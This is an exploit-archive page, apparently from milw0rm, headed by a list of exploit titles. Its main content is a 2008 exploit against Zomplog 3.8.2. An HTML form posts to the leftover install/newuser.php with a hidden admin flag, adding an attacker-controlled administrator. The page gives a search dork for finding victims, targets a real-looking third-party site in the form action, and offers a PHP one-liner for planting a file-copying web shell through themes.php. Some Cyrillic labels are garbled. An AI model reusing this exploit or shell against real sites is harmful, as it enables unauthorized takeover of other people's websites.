
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
49 lines
1.8 KiB
HTML
Executable file
49 lines
1.8 KiB
HTML
Executable file
======================== WEBXAKEP.NET ===========================
|
|
|
|
Name: "Zomplog 3.8.2 <= add admin"
|
|
Version: All
|
|
Script Download: http://www.zomp.nl/zomplog/
|
|
DORK: "powered by zomplog"
|
|
Discovered By: ArxWolf
|
|
Discovered On: 16 05 2008
|
|
WWW: http://WebXakep.net
|
|
ICQ: 504-282
|
|
|
|
Vulnerability to "install/newuser.php", to add 2 administrator.
|
|
Folder "install" not removed in 70% of cases.
|
|
|
|
Exploit:
|
|
--------------------------------------------------------
|
|
<br><b><center>ДобавлÑем админа "Add Admin"</center></b><br><br>
|
|
<!-- <form action="http://localhost/install/newuser.php" method="POST"> /-->
|
|
<form action="http://weblog.sgrim.us/install/newuser.php" method="POST">
|
|
<p>Титлы блога "Blog Title"<br />
|
|
<input type="text" name="weblog_title" maxlength="40" id="blogname" />
|
|
<br />
|
|
<br />
|
|
Логин "Username"<br />
|
|
<input type="text" name="login" maxlength="15" id="name" />
|
|
<br />
|
|
<br />
|
|
Пароль "Password"<br />
|
|
<input type="password" name="password" maxlength="15" id="pwd" />
|
|
<br />
|
|
<br />
|
|
ПовторÑем пароль "Confirm password"<br />
|
|
<input type="password" name="password2" maxlength="15" id="pwd2" />
|
|
<br />
|
|
<br />
|
|
<input name="admin" type="hidden" id="admin" value="1" />
|
|
<input name="submit_user" type="submit" value="Submit ››" id="submit" />
|
|
|
|
</p>
|
|
</form>
|
|
-------------------------------------------------------------
|
|
|
|
http://******/admin/profile.php // Add or delete user ^_^
|
|
http://******/admin/themes.php // If there is a right of entry you can fill shell. <?php copy($_GET['i'],$_GET['o']); ?>
|
|
|
|
|
|
========================= WEBXAKEP.NET ===========================
|
|
|
|
# milw0rm.com [2008-05-16]
|